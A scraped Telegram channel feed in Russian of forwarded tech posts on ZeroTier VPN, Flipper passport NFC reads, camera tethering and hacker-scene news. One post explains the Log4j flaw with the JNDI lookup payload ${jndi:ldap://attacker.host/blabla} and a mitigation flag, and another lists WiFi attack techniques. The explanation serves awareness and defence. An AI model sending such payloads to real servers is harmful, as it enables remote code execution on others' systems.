Forwarded from Zhovner Hub
VPN в два клика
У меня много всяких железок разбросанных в странных местах за NAT-ом, на работе в офисе, дома, на даче: сервера, raspberry pi, роутеры, компуктеры. Весь этот зоопарк на разных операционках: Windows, Linux, Mac, OpenWRT.
Чтобы на них быстро ходить нужен VPN. Мне лень накручивать OpenVPN потому что его долго разворачивать на клиенте.
Я использую ZeroTier, это модный хипстерский клауд-шмауд сервис.
Сейчас добавление новой машины в VPN сеть выглядит так:
Дальше в веб-морде я апрувлю новый узел, назначаю ему имя, комментарий. Также легко могу его забанить, удалить.
В веб-морде видно статус, внешний IP ноды. Каждой машине автоматически выдается постоянный внутренинй ipv4 и ipv6. Кайф. И главное никаких настроек, все что нужно это помнить ID своей сети, остальное настраивается мышкой веб-интерфейсе.
Единственное что я пока не осилил, это локальный DNS, чтобы обращаться к хостам типа
У меня много всяких железок разбросанных в странных местах за NAT-ом, на работе в офисе, дома, на даче: сервера, raspberry pi, роутеры, компуктеры. Весь этот зоопарк на разных операционках: Windows, Linux, Mac, OpenWRT.
Чтобы на них быстро ходить нужен VPN. Мне лень накручивать OpenVPN потому что его долго разворачивать на клиенте.
Я использую ZeroTier, это модный хипстерский клауд-шмауд сервис.
Сейчас добавление новой машины в VPN сеть выглядит так:
brew install --cask zerotier-one
zerotier-cli join ID-моей-сети
Дальше в веб-морде я апрувлю новый узел, назначаю ему имя, комментарий. Также легко могу его забанить, удалить.
В веб-морде видно статус, внешний IP ноды. Каждой машине автоматически выдается постоянный внутренинй ipv4 и ipv6. Кайф. И главное никаких настроек, все что нужно это помнить ID своей сети, остальное настраивается мышкой веб-интерфейсе.
Единственное что я пока не осилил, это локальный DNS, чтобы обращаться к хостам типа
govno.localForwarded from /home/lomalkin/log
This media is not supported in your browser
VIEW IN TELEGRAM
Флиппер читает загранпаспорт c NFC чипом.
Если присмотреться, то можно увидеть, как ID изменяется при каждом новом чтении. Это специальная фича используемого в загранах стандарта, чтобы предотвратить возможность отслеживания по уникальному номеру. Такое же поведение будет при попытке считать ID какого-нибудь Apple pay.
Сами данные, хранящиеся в чипе, просто так прочитать не удастся, т.к. они защищены ключом, который находится в MRZ (Machine Readable Zone), внизу страницы с фотографией.
Если присмотреться, то можно увидеть, как ID изменяется при каждом новом чтении. Это специальная фича используемого в загранах стандарта, чтобы предотвратить возможность отслеживания по уникальному номеру. Такое же поведение будет при попытке считать ID какого-нибудь Apple pay.
Сами данные, хранящиеся в чипе, просто так прочитать не удастся, т.к. они защищены ключом, который находится в MRZ (Machine Readable Zone), внизу страницы с фотографией.
Forwarded from Вастрик.Пынь
🔥 Квантовый Компьютер. Как устроен? Как программировать? Уже?
Сегодня будущее заглянет в наш в дом так глубоко, что в конце поста мы даже напишем свой первый квантовый Hello World и запустим его на настоящем квантовом компьютере.
Кажется, пост получился очень логически красивым и объясняет тему чуть лучше обычных статей в интернете (научрук поста подтверждает!)
Порепостите, пожалуйста. Вдруг кому-то такое всё еще интереснее комнат в клабхаусе :D
https://vas3k.ru/blog/quantum_computing/
Сегодня будущее заглянет в наш в дом так глубоко, что в конце поста мы даже напишем свой первый квантовый Hello World и запустим его на настоящем квантовом компьютере.
Кажется, пост получился очень логически красивым и объясняет тему чуть лучше обычных статей в интернете (научрук поста подтверждает!)
Порепостите, пожалуйста. Вдруг кому-то такое всё еще интереснее комнат в клабхаусе :D
https://vas3k.ru/blog/quantum_computing/
Forwarded from Zhovner Hub
Хабр
Flipper Zero — вымученная сертификация, открытие исходников и новые приколдесы
Flipper Zero — проект карманного мультитула для хакеров в формфакторе тамагочи, который мы разрабатываем. Предыдущие посты [ 1 ],[ 2 ],[ 3 ],[ 4 ],[ 5 ],[ 6 ],[ 7 ],[ 8 ],[ 9 ],[ 10 ],[ 11 ],[ 12 ]....
Forwarded from Михаил Светов (Комитет по Этике)
Сегодня в 20:00 ко мне в гости придёт Павел Жовнер! Обсудим русских хакеров, цифровую безопасность, флиппер зеро, эволюцию хакерской сцены и каково это проснуться миллионером. Подключайтесь, будет очень интересно!
https://youtu.be/c3JQM8_O-Ao
https://youtu.be/c3JQM8_O-Ao
YouTube
РУССКИЙ НАЦИОНАЛЬНЫЙ ХАКИНГ : Павел Жовнер в гостях у Михаила Светова
Сегодня в 20:00 ко мне в гости придёт Павел Жовнер! Обсудим русских хакеров, цифровую безопасность, флиппер зеро, эволюцию хакерской сцены и каково это проснуться миллионером. Подключайтесь, будет очень интересно!
ВОПРОСЫ В ЭФИР https://new.donatepay.ru/@svtv…
ВОПРОСЫ В ЭФИР https://new.donatepay.ru/@svtv…
Forwarded from Zhovner Hub
Камера которая снимает ВИДЕО сразу в комп (tethering)
Я давно мечтаю о камере, которая умеет снимать видео сразу в комп. При этом полностью управляется с компа — экспозиция, фокус, зум, все-все настройки сохраняются на компе, не нужно трогать камеру руками вообще. То есть нажал "запись" и на компе появился файл в оригинальном качестве.
Такие бывают?
Я давно мечтаю о камере, которая умеет снимать видео сразу в комп. При этом полностью управляется с компа — экспозиция, фокус, зум, все-все настройки сохраняются на компе, не нужно трогать камеру руками вообще. То есть нажал "запись" и на компе появился файл в оригинальном качестве.
Такие бывают?
Forwarded from Aleksandr Zhitnik
Немного по теме, но возможно возьмёте на заметку https://monitorplus.cc/
Forwarded from Андрей Письменный
Есть gPhoto2, когда-то снимал таймлапсы с помощью распбери, батарейки и фотоаппарата Canon на штативе. Судя по документации, видео тоже может снимать на некоторых камерах http://gphoto.org/doc/remote/
Forwarded from NN
привет с Ильичевска) https://tv-project.com/ru/ptz-kamera-canon-cr-n300.html?gclid=Cj0KCQiAxc6PBhCEARIsAH8Hff2rSU2JUBI3zj1aVu83MLFRvNIE7bZOESPR9S46VY0oqnHFmXnP10IaAvmrEALw_wcB не ошибешься😂
Tv-Project
Canon CR-N300 - PTZ камера для потоковой передачи через IP купить
Портативная PTZ камера Canon CR-N300 с 20-кратным оптическим зумом и возможностью съемки в 4K UHD для съемок кино и прямых трансляций по IP ☎️ (044) 360-0919
Forwarded from Alexander Rodionov 📊🐍🦕🥦🥬🥒🍏🌵🦚🌲🌳🌴🌿☘️🍀🦖🦎🐊🐸🍃🦠🌱🐢🐉🌾
Рабочая схема для бедных:
Берешь ведро с норм камерой
Ставишь termux + termux-api https://wiki.termux.com/wiki/Termux:API
Или adb shell (более геморно, менее удобно)
ssh с компа на ведро И фоткаешь камеру из терминала на компе. Контроль параметров iso итд думаю можно на гитхабе поковыряться в кишках
Потом синкаешь DCIM папку через rsync/SCP на комп по ssh
Андрюша топчик короче
Берешь ведро с норм камерой
Ставишь termux + termux-api https://wiki.termux.com/wiki/Termux:API
Или adb shell (более геморно, менее удобно)
ssh с компа на ведро И фоткаешь камеру из терминала на компе. Контроль параметров iso итд думаю можно на гитхабе поковыряться в кишках
Потом синкаешь DCIM папку через rsync/SCP на комп по ssh
Андрюша топчик короче
Forwarded from ANDREW 𝙁𝙀
*альтернативное решение*
Поддерживает uvc,
так что можно открыть quick time и сразу писать поток, хоть в 4к
https://www.elgato.com/en/cam-link-4k
Поддерживает uvc,
так что можно открыть quick time и сразу писать поток, хоть в 4к
https://www.elgato.com/en/cam-link-4k
Forwarded from Zhovner Hub
Forwarded from Zhovner Hub
Люблю когда везде есть системность https://www.kommersant.ru/doc/5141075
Коммерсантъ
Первый ГОСТ на братские могилы в России начнет действовать с февраля
Подробнее на сайте
Forwarded from Кавычка (Bo0oM)
У половины интернета нашли выполнение произвольного кода через Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Forwarded from Zhovner Hub
Посоветуйте кулхацкерскую мобилу на Android
Никогда в жизни не использовал Kali Nethunter. Какую мобилу лучше всего взять, чтобы она умела:
* Атаки на WiFi: pixie wps, PMKID, сниффер хендшейков, точка доступа MANA
* Сбор данных о сотовых вышках для cellmaper
* Нормальный LTE cat 6 (или хотя бы cat 4)
Никогда в жизни не использовал Kali Nethunter. Какую мобилу лучше всего взять, чтобы она умела:
* Атаки на WiFi: pixie wps, PMKID, сниффер хендшейков, точка доступа MANA
* Сбор данных о сотовых вышках для cellmaper
* Нормальный LTE cat 6 (или хотя бы cat 4)